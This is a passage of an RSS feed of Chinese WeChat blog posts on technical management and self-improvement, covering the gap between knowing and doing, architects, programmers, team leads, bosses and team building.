宋体;">大部分人都存在自作聪明、好高骛远的，这很正常。知道很多道理，也不一定都管用（每个人都有很正确的观点，但不一定都适应你），但的确会更明白点、通透一些。关键是从知道到做到，以及结果的体现（当然有时候过程本身也是一种结果）。</span><br/></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">   只有书本知识，没有实际斗争经验，谓之半知;既有书本知识，又有实际斗争经验，知行合一，谓之全知。—— 徐特立</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;text-indent: 21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">人最大的痛苦，就是无法跨越知道和做到的一个鸿沟。——罗翔</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;text-indent: 21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">方法策略方向：</span></p><p style="margin-left: 39pt;text-indent: -18pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">1.提升认知，看清本质，知不等于信，信才影响行。</span></p><p style="margin-left: 39pt;text-indent: -18pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">2.淡化好为人师的“荣誉感”</span></p><p style="margin-left: 39pt;text-indent: -18pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">3.多做减法，提倡做（对抗眼高手低的熵增）</span></p><p style="margin-left: 39pt;text-indent: -18pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">4.格物致知（经事，事上磨炼）</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;margin-left: 21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;font-style: italic;">PS:方法越简单越好，切勿大而全，为了追求方法而设立方法。坚持一两个即可。</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;"><img class="rich_pages wxw-img" data-ratio="0.8589511754068716" data-type="png" data-w="553" style="width: 553.3400268554688px;height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=45bb6e81&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtJrsEibp28GJT4TkGqDC8rFhXpeqYUQibEsAz3pIuibmErDcZ8pXW4Bt2oN9icdSyIyg0pPvS8sIE2HQA%2F640%3Fwx_fmt%3Dpng"/></span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;"><br/></span></p><h1 style="text-align: left;margin-left: 21.6pt;text-indent: -21.6pt;break-after: avoid;font-size: 22pt;font-family: 宋体;line-height: 1.75em;margin-bottom: 5px;margin-top: 5px;"><span style="font-size: 24px;"><strong><span style="font-size: 24px;font-family: 宋体;">7 后记</span></strong></span></h1><ol class="list-paddingleft-2" style="list-style-type: decimal;"><li><h1>本文虽然描述了很多方法论和策略，但并不代表自己是一个非常成熟的管理者（技术Leader）</h1></li><li><p>本文观点，只是结合所见所感以及摘录的解读及分析，并不代表可适配任何场景，甚至有可能换个场景，观点相悖。（尽信书不如无书）</p></li><li><p>三省吾身，通过反思、分析、归纳总结 及汇编，希望多多少少帮助到其他人。</p></li></ol><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;"><br/></span></p>



<p><a href="2247483905">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=d4099fd7&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU0NTI4MDQwMQ%3D%3D%26mid%3D2247483905%26idx%3D1%26sn%3D2f0b40a22af8d98cc394224fc9e1e1a3%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Sat, 05 Feb 2022 07:59:00 +0800</pubDate>
    </item>
    <item>
      <title>技术管理所见所感-上卷</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU0NTI4MDQwMQ==&amp;mid=2247483874&amp;idx=1&amp;sn=3d39988460f702190e7893967480bf6b</link>
      <description>技术管理点滴思考，修炼ing</description>
      <content:encoded><![CDATA[<p>
原创 <span>程远ing</span> <span>2022-01-31 06:25</span> <span style="display: inline-block;"></span>
</p>

<p>技术管理点滴思考，修炼ing</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=4f54687f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FgS0DP6tuCtIjL4YGe8jdbICeDpIibZXX78D2JJiaVs1OqlPGHbWfvJWv02QdORh5JkPcPicxuuR3Iq6MmbE1qo2Pg%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="properties"><code><span class="code-snippet_outer"><span class="code-snippet__attr">0x00</span> <span class="code-snippet__string">技术阶段</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__attr">0x01</span> <span class="code-snippet__string">架构师</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__attr">0x02</span> <span class="code-snippet__string">程序员</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__attr">0x03</span> <span class="code-snippet__string">TL个性</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__attr">0x04</span> <span class="code-snippet__string">老板</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__attr">0x05</span> <span class="code-snippet__string">技术团队</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__attr">0x06</span> <span class="code-snippet__string">成长路径</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__attr">0x07</span> <span class="code-snippet__string">管理意识</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__attr">0x08</span> <span class="code-snippet__string">文化价值观</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__attr">0x09</span> <span class="code-snippet__string">后记</span></span></code></pre></section><section style="text-align: justify;margin-left: 0pt;text-indent: 0pt;break-after: avoid;font-size: 22pt;font-family: 等线;line-height: 1.75em;margin-bottom: 5px;margin-top: 5px;"><span style="color: rgb(2, 30, 170);"><strong><span style="font-family: 等线;font-size: 24px;">0x00 技术阶段</span></strong></span><br/></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><strong><span style="font-family:等线;">1.做事阶段</span></strong></section><section style="margin-left: 42pt;text-indent: -21pt;text-align: left;line-height: 1.75em;"><span style="font-family:等线;">a)第一个阶段，做自己想做的事情；</span></section><section style="margin-left: 42pt;text-indent: -21pt;text-align: left;line-height: 1.75em;"><span style="font-family:等线;">b)第二个阶段，去做那些不想做，但又必须得做的事情；</span></section><section style="margin-left: 42pt;text-indent: -21pt;text-align: left;line-height: 1.75em;"><span style="font-family:等线;">c)第三个阶段：找到一群合适的人，去帮你做那些你不想做，也不擅长的事情；</span></section><section style="margin-left: 42pt;text-indent: -21pt;text-align: left;line-height: 1.75em;"><span style="font-family:等线;">d)最后一个阶段，有机会去做那些自己内心真正想做的事情。</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><strong><span style="font-family:等线;">2.技术人生</span></strong></section><section style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">a)第一阶段各种折腾，写各种代码，成了一个伪全栈，还挺开心的；</span></section><section style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">b)第二阶段折腾开源，发现了新大陆，各种新玩法，好东西，很喜欢分享；</span></section><section style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">c)第三阶段布道，觉得别人能行自己也能行，硬抗了二年，很累；</span></section><section style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">d)第四阶段带人管理，参加超级项目，心脑体都是煎熬，但对心智的打磨很有意思。</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><strong><span style="font-size: 17px;font-family: 等线;">3.哲学与IT</span></strong></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;"><span style="font-size: 17px;font-family: 等线;">       哲学和 IT 技术是相似的，哲学解决问题的逻辑是：从归纳到理论，再到演绎，IT 技术解决问题的逻辑是：从 梳理抽象逻辑，到建模，再应用到这一类的场景，都是从“特殊”到“一般”再到“特殊”的一个过程。但哲学和 IT 建模也有区别，哲学更偏向于“道”的层面，IT 建模则偏向于“器”的层面。我们常说“道法术器”，只有道，没有器，没有具体的步骤和工具，是很难落实和执行的。我们需要用 IT 建模的思想，来帮助管理者解决管理思想落地的问题。</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><strong><span style="font-size: 17px;font-family: 等线;">4.道法术器</span></strong></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;"><span style="font-size: 17px;font-family: 等线;">       第一，道的层面：就是理念，我们认为高效的团队和个人是提升研发效率的关键；</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;"><span style="font-family: 等线;font-size: 17px;">       第二，法的层面：就是方法、套路，从活力、贡献、管理、能力、协同等维度切入改进，提升个人及团队的能力，优化协作。</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;"><span style="font-family: 等线;font-size: 17px;">       第三，术的层面：就是具体实践，我们倡导微战队、静默时间和首席工程师。静默时间就是在静默时间编程，首席工程师是把团队中的高效个人单独划分出来，组成优秀团队，由部门经理直接管理，这个团队中的同学还有一个特权，可以挑选工作。</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;"><span style="font-family: 等线;font-size: 17px;">       第四，器的层面：工欲善其事，必先利其器，要提高效率，一定要为员工提供先进、易用、贴切的工具和工具链服务。</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;"><span style="font-family:等线;"><shape type="#_x0000_t75" filled="f" style="text-indent:0;left:0;width:414.99997pt;height:234.69998pt;"><imagedata title="image1"></imagedata></shape><img class="rich_pages wxw-img" data-backh="313" data-backw="553" data-ratio="0.566003616636528" style="width: 100%;height: auto;" data-type="png" data-w="553" src="https://wechat2rss.xlab.app/img-proxy/?k=6426af62&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtIjL4YGe8jdbICeDpIibZXX73cAdQ1JLS9OBBztreQicjZSha2yMyLbzkO7MOJGibdAcOmPXD8Z8CJew%2F640%3Fwx_fmt%3Dpng"/></span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;"><span style="font-family:等线;"><br/></span></section><h1 style=""></h1><h1 style="line-height: 1.75em;"><br/></h1><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h1 style="line-height: 1.75em;margin-bottom: 5px;"><strong style="color: rgb(2, 30, 170);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-family: 等线;font-size: 24px;">0x01 架构师</span></strong><br/></h1><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;text-indent: 2em;"><span style="font-family: 等线;font-size: 17px;">无论是编程开发，还是黑客攻防，都会有一个过渡——架构体系，架构师的一点观点参考：</span></p><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">1.架构师都要有觉悟，理解并发现问题永远比解决问题更加重要，遇到问题首先进行分析，不要急于解决问题。</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">2.架构师是一个充满挑战的职业，知识面的宽窄往往决定着一个架构师的架构能力，你需要阅读大量的技术书籍，但是不要仅限于软件相关的书籍。</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">3.技术人员如果要成为架构师，就必须跳出技术的视角，换一个角度去看技术。要把时间花在研究生命周期规律和业务的增长上，花在选择合适的技术上，而不只是追求新潮的或自己喜欢的技术。</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">4.架构师-广；技术专家-深</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;"><span style="font-family:等线;"><img class="rich_pages wxw-img" data-backh="239" data-backw="553" data-ratio="0.4321880650994575" style="width: 100%;height: auto;" data-type="png" data-w="553" src="https://wechat2rss.xlab.app/img-proxy/?k=3722fc1c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtIjL4YGe8jdbICeDpIibZXX7IfHUN9ou8ANfOtiaksxibico7hcyj5W6c5ZsPpXRib4qb8HtqDwib9GibAdQ%2F640%3Fwx_fmt%3Dpng"/></span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;"><span style="font-family:等线;"><br/></span></section><h1 style="line-height: 1.75em;"><br/></h1><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h1 style="line-height: 1.75em;margin-bottom: 5px;"><span style="color: rgb(2, 30, 170);"><strong><span style="color: rgb(2, 30, 170);font-family: 等线;font-size: 24px;">0x02 程序员</span></strong></span></h1><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">1.“不服看代码（show me the code）”就是技术人才最主要的态度</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">2.个人英雄</span></section><section style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">a)每个人都有个疲惫中的英雄梦</span></section><section style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">b)每个技术人，也都是希望自己的技术是NO.1</span></section><section style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">c)大多数还是希望个人英雄，众星捧月般存在</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">3.But，英雄（明星球员）更多是团队内部培养出来的，不一定是从外面雇佣过来的，很多时候他们会在企业成长为超级明星。</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">4.可能只有 10% 的人愿意成为管理者，90% 的人其实更愿意过简单的生活</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">5.编程其实是一门艺术，热爱和用心是非常重要的，优秀的程序员都是艺术家</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">6.Motivation 的主要因素，其主要因素有三点。</span></section><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;text-indent: 2em;"><span style="font-family: 等线;font-size: 17px;">第一点是尊重与认可，因为人具有社会属性，每个人都希望得到认可，感受到荣誉感与归属感。</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;text-indent: 2em;"><span style="font-family: 等线;font-size: 17px;">第二点是个人能力的成长，而个人成长只靠自我驱动是不够的，还需要依靠团队的帮助，比如团队成员间的相互促进和知识的传递分享等。</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;text-indent: 2em;"><span style="font-family: 等线;font-size: 17px;">第三点是职业发展通道与个人兴趣的匹配度，也就是个人职业生涯是否符合他的个人兴趣，兴趣可以激发动力，这一点不难理解。</span></p><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">7.每个人在做任何事情的时候，都希望得到来自群体的反馈和认可，没有人可以免俗。只有得到周围的认可，他才会觉得有安全感。</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;"><span style="font-family:等线;"><img class="rich_pages wxw-img" data-backh="261" data-backw="553" data-ratio="0.4719710669077758" style="width: 100%;height: auto;" data-type="png" data-w="553" src="https://wechat2rss.xlab.app/img-proxy/?k=b2ea2b8c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtIjL4YGe8jdbICeDpIibZXX7Onxfz6jOibnyB17CXeHvwBME8aMrIic6t4QAYpUEgtTCQzqOpcTI0nFA%2F640%3Fwx_fmt%3Dpng"/></span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;"><span style="font-family:等线;"><br/></span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;"><span style="font-family:等线;"><br/></span></section><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h1 style="line-height: 1.75em;margin-bottom: 5px;"><span style="color: rgb(2, 30, 170);"><strong><span style="color: rgb(2, 30, 170);font-size: 24px;font-family: 等线;">0x03 TL个性</span></strong></span><br/></h1><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;"><span style="font-family: 等线;font-size: 17px;">TL（Team/technology leader）存在一些个性和相似相通之处：</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">1.以成功为目的，不以成名为目的；要关注目标达成重于实现路径；要有站在台下的精神准备；还有一点非常重要，受得了委屈。</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">2.有确定性</span></section><section style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">a)你作为管理者，不管你在还是不在，团队都会按照一个共识去做事情。就算你不在，大家也都敢放心大胆的这么去做，因为你给了他们确定性，让他们知道这么做是对的，大家能知道对错、知道好坏。</span></section><section style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">b)你个人是确定，没必要让干活的兄弟去研究你的不确定。</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">3.保持思辨和平和。</span></section><section style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">a)存在即合理</span></section><section style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">b)各自都有理由，了解背后的本质需求</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">4.软技能：包括持续学习能力、沟通能力、领导力、洞察力、认知能力以及各种思维能力（结构化思维、逆向思维、深度思考、换位思考…）。</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">5.之前做码农的时候，核心竞争力是较强的编程能力以及算法的掌握程度。但作为技术管理者，我认为核心竞争力应该转变为综合能力，比如高效沟通能力、项目管理能力、团队建设能力，以及对技术方向的把控能力等等。所以，对于技术管理者而言，真正重要的并不是自己又掌握了新的技术，而是能带领整个团队完成更多有挑战、有价值的项目，以项目的产出结果为导向。</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">6.一名优秀的架构师，需要以下这四个关键能力：取舍、前瞻、抽象、容错。</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">7.简单，是终极的复杂。</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">8.每个人的一生都是苦行僧。</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">9.决策能力又是与自身的技术积累，以及吸收新技术、新知识的能力密切相关的，保持一颗开放、积极的心态，保持对技术的严谨调研态度，以数据说话，这样才会做出正确的决</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">10.评判一个管理者的好坏，从来不是看测验的民意，</span><span style="font-family:等线;font-weight:bold;">而是看输出的成绩</span><span style="font-family:等线;">。</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">11.管理者需要为成果而工作，以结果为导向。一位卓越的管理者不应该在工作一开始就身先士卒地从事具体的工作，更不应该把精力放在研究技术实现的细节上，而是首先问问自己：“客户期望我做出什么样的成果？”然后再对整个项目进行规划。</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">12.一名优秀的技术管理者，技术在前，管理在后，并不是说两者有太大的轻重差异，而是你需要花费70%的时间在技术上，只能花30%的时间在管理上，但是你需要用这30%的时间做完100%的管理工作</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">13.《庄子》物来则应，过去不留。  ---  自在无碍所做皆成。</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">14.做工程师是‘一个人吃饱全家不饿’，做管理者就是‘上有老下有小’；</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">15.善用威者不轻怒，善用恩者不妄施。</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;"><span style="font-family:等线;"><img class="rich_pages wxw-img" data-backh="931" data-backw="430" data-ratio="2.1651162790697676" style="width: 100%;height: auto;" data-type="png" data-w="430" src="https://wechat2rss.xlab.app/img-proxy/?k=c72283c9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtIjL4YGe8jdbICeDpIibZXX72FZaF1rlbictKic7whVBQo7hLd2EIKyZ8tsfc5M32UBJcOB7d1pPkS0w%2F640%3Fwx_fmt%3Dpng"/></span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;"><span style="font-family:等线;"><img class="rich_pages wxw-img" data-backh="931" data-backw="430" data-ratio="2.1651162790697676" style="width: 100%;height: auto;" data-type="png" data-w="430" src="https://wechat2rss.xlab.app/img-proxy/?k=6749a174&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtIjL4YGe8jdbICeDpIibZXX7CCCtbN8FwV8Xs3ibJSiadcklhNWKtNj1KpqwPwAHJhJbfZ9MAphia4ibKA%2F640%3Fwx_fmt%3Dpng"/></span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;"><span style="font-family:等线;"><br/></span></section><h1 style="line-height: 1.75em;"><br/></h1><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h1 style="line-height: 1.75em;margin-bottom: 5px;"><span style="color: rgb(2, 30, 170);"><strong><span style="color: rgb(2, 30, 170);font-family: 等线;font-size: 24px;">0x04 老板</span></strong></span></h1><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;text-indent: 21pt;line-height: 1.75em;"><span style="font-family: 等线;font-size: 17px;">老板也可以理解公司大战略，也可以理解自己的上级。但不管谁，都是主要为了业务在服务。都是统一战线。(大河有水小河满 大河无水小河干)</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">1.老板反复强调的问题，需要仔细思考并充分理解，你肯定可以从中学到东西，提高自己的认知。</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">2.老板的思维方式一般是先关注结果，再看过程。</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">3.老板是很忙，但没有你想象的忙，老板的忙和你理解的忙可能是不一样的，他们用来思考的时间比实际做事情的时间多；你认为重要的事情，老板可能不在意。</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">4.老板，会从整体角度去分析问题，并做出最优的决策。</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;"><span style="font-family:等线;"><img class="rich_pages wxw-img" data-backh="217" data-backw="553" data-ratio="0.3924050632911392" style="width: 100%;height: auto;" data-type="png" data-w="553" src="https://wechat2rss.xlab.app/img-proxy/?k=5d16c2df&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtIjL4YGe8jdbICeDpIibZXX7FV7aqK7RjXkYmYmuqE6LjxUfNHgDIaNib33a8NhsDHicSt7ibE4wHq99g%2F640%3Fwx_fmt%3Dpng"/></span></section><h1 style="line-height: 1.75em;"><br/></h1><h1 style="line-height: 1.75em;"><span style="font-family:等线;"><br/></span></h1><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h1 style="line-height: 1.75em;margin-bottom: 5px;"><span style="color: rgb(2, 30, 170);"><strong><span style="color: rgb(2, 30, 170);font-family: 等线;font-size: 24px;">0x05 技术团队</span></strong></span><br/></h1><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">1.技术团队的组建分两个方向，比如刘国梁团队与西游记团队，刘国梁团队是通过层层筛选，都是精兵强将，而西游记团队则是各有亮点，互为补充。</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">2.技术团队还是要尽量扁平化、尽量减少一些中间层级；</span></section><section style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">a)真自律的的技术，也不太需要被管理。</span></section><section style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">b)一些无意义的报表的确该省则省。</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">3.技术就像武功，人外有人，天外有天；但技术也不全像武功，它依靠的不是单打独斗，而是团队协作。</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;"><span style="font-family:等线;"><img class="rich_pages wxw-img" data-backh="399" data-backw="553" data-ratio="0.7215189873417721" style="width: 100%;height: auto;" data-type="png" data-w="553" 